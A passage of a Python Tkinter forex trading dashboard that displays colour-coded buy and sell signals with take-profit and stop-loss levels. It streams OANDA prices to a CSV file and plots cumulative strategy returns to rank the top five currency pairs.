text = signal[1], bg= "#42f55a")
butnPos.configure(text= "{}".format(signal[1]))
butnPos.grid(row = enum+rowDisplaced, column =1)
#--datetime
butnDate = tk.Button(self.Sigframe, width = 20, height = 2, \
text = signal[2], bg= "#42f55a")
butnDate.configure(text= "{}".format(signal[2]))
butnDate.grid(row = enum+rowDisplaced, column =2)
#--close
butnClose = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[3], 5), bg= "#42f55a")
butnClose.configure(text= "@{}".format(round(signal[3], 5)))
butnClose.grid(row = enum+rowDisplaced, column =3)
#--tp1
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[4], 5), bg= "#42f55a")
butnTP.configure(text= "TP1:{}".format(round(signal[4], 5)))
butnTP.grid(row = enum+rowDisplaced, column =4)
#--tp2
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[5], 5), bg= "#42f55a")
butnTP.configure(text= "TP2:{}".format(round(signal[5], 5)))
butnTP.grid(row = enum+rowDisplaced, column =5)
#--tp3
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[6], 5), bg= "#42f55a")
butnTP.configure(text= "TP3:{}".format(round(signal[6], 5)))
butnTP.grid(row = enum+rowDisplaced, column =6)
#--sl
butnSL = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[7], 5), bg= "#42f55a")
butnSL.configure(text= "SL:{}".format(round(signal[7], 5)))
butnSL.grid(row = enum+rowDisplaced, column =7)
elif signal[1] == 'SELL':
#--stock
butnpair = tk.Button(self.Sigframe, width = 9, height = 2, \
text = signal[0])
butnpair.grid(row = enum+rowDisplaced, column =0)
#--position
butnPos = tk.Button(self.Sigframe, width = 9, height = 2, \
text = signal[1], bg= "#f54242")
butnPos.configure(text= "{}".format(signal[1]))
butnPos.grid(row = enum+rowDisplaced, column =1)
#--datetime
butnDate = tk.Button(self.Sigframe, width = 20, height = 2, \
text = signal[2], bg= "#f54242")
butnDate.configure(text= "{}".format(signal[2]))
butnDate.grid(row = enum+rowDisplaced, column =2)
#--close
butnClose = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[3], 5), bg= "#f54242")
butnClose.configure(text= "@{}".format(round(signal[3], 5)))
butnClose.grid(row = enum+rowDisplaced, column =3)
#--tp1
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[4], 5), bg= "#f54242")
butnTP.configure(text= "TP1:{}".format(round(signal[4], 5)))
butnTP.grid(row = enum+rowDisplaced, column =4)
#--tp2
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[5], 5), bg= "#f54242")
butnTP.configure(text= "TP2:{}".format(round(signal[5], 5)))
butnTP.grid(row = enum+rowDisplaced, column =5)
#--tp3
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[6], 5), bg= "#f54242")
butnTP.configure(text= "TP3:{}".format(round(signal[6], 5)))
butnTP.grid(row = enum+rowDisplaced, column =6)
#--sl
butnSL = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[7], 5), bg= "#f54242")
butnSL.configure(text= "SL:{}".format(round(signal[7], 5)))
butnSL.grid(row = enum+rowDisplaced, column =7)
else:
#--stock
butnpair = tk.Button(self.Sigframe, width = 9, height = 2, \
text = signal[0])
butnpair.grid(row = enum+rowDisplaced, column =0)
#--position
butnPos = tk.Button(self.Sigframe, width = 9, height = 2, \
text = signal[1])
butnPos.configure(text= "{}".format(signal[1]))
butnPos.grid(row = enum+rowDisplaced, column =1)
#--datetime
butnDate = tk.Button(self.Sigframe, width = 20, height = 2, \
text = signal[2])
butnDate.configure(text= "{}".format(signal[2]))
butnDate.grid(row = enum+rowDisplaced, column =2)
#--close
butnClose = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[3], 5))
butnClose.configure(text= "@{}".format(round(signal[3], 5)))
butnClose.grid(row = enum+rowDisplaced, column =3)
#--tp1
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[4], 5))
butnTP.configure(text= "TP1:{}".format(round(signal[4], 5)))
butnTP.grid(row = enum+rowDisplaced, column =4)
#--tp2
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[5], 5))
butnTP.configure(text= "TP2:{}".format(round(signal[5], 5)))
butnTP.grid(row = enum+rowDisplaced, column =5)
#--tp3
butnTP = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[6], 5))
butnTP.configure(text= "TP3:{}".format(round(signal[6], 5)))
butnTP.grid(row = enum+rowDisplaced, column =6)
#--sl
butnSL = tk.Button(self.Sigframe, width = 9, height = 2, \
text = round(signal[7], 5))
butnSL.configure(text= "SL:{}".format(round(signal[7], 5)))
butnSL.grid(row = enum+rowDisplaced, column =7)
self.Sigframe.grid(row = 5, column = 0, pady = 5)
#run auto updates
def runSignal(self):
self.timer = str(self.timeEntry.get())
        # refresh interval in milliseconds for each timer setting (default: 15 minutes)
        intervals = {'M15': 900000, 'M30': 1800000, 'H1': 3600000, 'H2': 7200000,
                     'H3': 10800000, 'H4': 14400000, 'H6': 21600000, 'H8': 28800000,
                     'H12': 43200000, 'D1': 86400000}
        self.time = intervals.get(self.timer, 900000)
self.signalGUI()
self.after(self.time, self.runSignal)
#--Quote
class Quote():
def __init__(self, path):
'''Docstring
params: path: dictionary of mainpath, account path and
token path
return type: None
'''
self.path = path
self.quoteStreamer()
def accountDetails(self):
#account -ID
with open(os.path.join(self.path['mainPath'], self.path['acountPath'])) as acc:
accountID = acc.readline().strip()
#token
with open(os.path.join(self.path['mainPath'], self.path['tokenPath'])) as tok:
token = tok.readline().strip()
#account API
api = API(access_token=token, environment=self.path['environment'])
return accountID, api
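    # accountDetails() expects two one-line text files under mainPath: the OANDA account ID at
    # path['acountPath'] and the API token at path['tokenPath']; both are stripped and used to
    # build an oandapyV20 API client for the configured environment.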
def arrowHead(self, prev, new):
'''Docstring
        function compares the previous bid price with the
        new bid price and returns a direction indicator.
:params: prev: previous bid price
:params: new: new bid price
:Return type: ^ Up
v Down
'''
if new > prev:
return '^'
else:
return 'v'
def quoteStreamer(self):
AccID, api = self.accountDetails()
if not os.path.exists(os.path.join(self.path['mainPath'], 'TICKERS')):
os.makedirs(os.path.join(self.path['mainPath'], 'TICKERS'))
try:
            # count stream restarts outside the loop so the back-off below can actually trigger
            n = 0
            while True:
s = PricingStream(accountID=AccID, params={"instruments": self.path['instruments']})
tickers = []
try:
for R in api.request(s):
                        if R['type'] != 'PRICE':
                            # heartbeat and other non-price messages carry no quotes; skip them
                            continue
                        rec = {'tickers': R['instrument'], 'bids': R['bids'][0]['price'], 'asks': R['asks'][0]['price'], 'direction': 'v'}
                        if len(tickers)+1 <= len(self.path['instruments'].split(',')):
                            tickers.append(rec)
                        else:
                            for enum, ii in enumerate(tickers):
                                previous_bid = tickers[enum]['bids']
                                if tickers[enum]['tickers'] == R['instrument']:
                                    tickers[enum]['bids'] = R['bids'][0]['price']
                                    tickers[enum]['asks'] = R['asks'][0]['price']
                                    tickers[enum]['direction'] = self.arrowHead(previous_bid, tickers[enum]['bids'])
                            df = pd.DataFrame(tickers, columns=['tickers', 'bids', 'asks', 'direction'])
                            df.to_csv(os.path.join(self.path['mainPath'], 'TICKERS/streams.csv'))
                            print(tickers)
except:
pass
n += 1
try:
if n > 10:
time.sleep(10)
except:
pass
continue
except:
pass
#--Recommendation
class Returns(ttk.Frame):
def __init__(self, master, path):
ttk.Frame.__init__(self, master)
self.path = path
self.figsize = (12, 7)
self.ncol = 8
optionFrame = ttk.Frame(self)
style = ttk.Style()
style.map('TCombobox', fieldbackground=[('readonly','#e3104f')])
style.map('TCombobox', selectbackground=[('readonly', '#e3104f')])
style.map('TCombobox', selectforeground=[('readonly', 'white')])
strategy = tk.Label(optionFrame, text = 'Strategy').grid(row = 1, column = 0)
self.strategyOption = ttk.Combobox(optionFrame, values = self.path['strategy'], state = 'readonly')
self.strategyOption.current(32)
self.strategyOption.focus()
self.strategyOption.grid(row = 1, column = 1, padx = 20, pady = 10)
self.strategyOption.bind("<<ComboboxSelected>>", self.callback)
#timeframe frame
timframe = tk.Label(optionFrame, text = 'Timeframe').grid(row = 1, column = 2)
self.timeOption = ttk.Combobox(optionFrame, values = self.path['timeframes'], state = 'readonly')
self.timeOption.current(2)
self.timeOption.focus()
self.timeOption.grid(row = 1, column = 3, padx = 20, pady = 10)
self.timeOption.bind("<<ComboboxSelected>>", self.callback)
self.update = tk.Button(optionFrame, text = 'Update', bg = '#a1a09f', command = self.plotReturns).grid(row = 1, column = 4, padx = 20, pady = 10)
#option frame
optionFrame.grid(row = 0, column = 0)
self.plotReturns()
def callback(self, eventObject):
return eventObject.widget.get()
def plotReturns(self):
from collections import Counter
returnplot = ttk.Frame(self)
pairs = path['instruments'].split(',')
grabstrategy = str(self.strategyOption.get())
grabtimeframe = str(self.timeOption.get())
Framesort = tk.Frame(self)
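        # Every strategy branch below follows the same recipe: load the predicted CSV for each
        # pair, compute the per-bar strategy return r_t = ln(Close_t / Close_{t-1}) * signal_{t-1},
        # accumulate it with a cumulative sum, rank the five pairs with the highest mean
        # cumulative return, and embed all equity curves in a single matplotlib Figure.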
if grabstrategy == str(1):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM, fill = tk.BOTH, expand = True)
elif grabstrategy == str(2):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(3):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(4):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(5):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(6):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(7):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(8):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(9):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(11):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(22):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(33):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
label = tk.Button(Framesort, text = 'HIGHEST RETURNS (TOP 5 IN DESCENDING ORDER)', bg = '#42f55a').grid(row = 3, column = 0, padx = 10)
for enum, ii in enumerate(highestReturns):
returnCommons = tk.Button(Framesort, bg = '#42f55a')
returnCommons.configure(text = f'{enum+1}. {ii}')
returnCommons.grid(row = 3, column = enum+3)
Framesort.grid(row = 2, column = 0)
fig = Figure(figsize=self.figsize)
subplots = fig.add_subplot(111)
for ii in returns.columns:
subplots.plot(np.arange(len(returns)), returns[ii])
subplots.legend(bbox_to_anchor=(0, 1.01, 1, .102), loc=3, ncol = self.ncol, borderaxespad=0)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, returnplot)
canvas.draw()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, returnplot)
toolbar.update()
canvas.get_tk_widget().pack(side = tk.BOTTOM,fill = tk.BOTH, expand = True)
elif grabstrategy == str(44):
returns = pd.DataFrame()
maximum = {}
highestReturns = []
for stockPair in pairs:
data = pd.read_csv(os.path.join(path['mainPath'], f"{path['predicted']}/STRATEGY_{grabstrategy}/{grabtimeframe}/{stockPair}"+'.csv'))
data['timestamp'] = pd.to_datetime(data['timestamp'])
data = data[data.Position != 'EXIT']
data['signal'] = np.where(data.Position == 'BUY', 1, 0)
data['return'] = np.log(data.Close/data.Close.shift(1))
data['return'] = data['return'] * data.signal.shift(1)
returns['{}'.format(stockPair)] = np.cumsum(data['return'])
for ii in returns.columns:
maximum[ii] = np.mean(returns[ii])
maximum = Counter(maximum)
for tradethis in maximum.most_common(5):
highestReturns.append(tradethis[0])
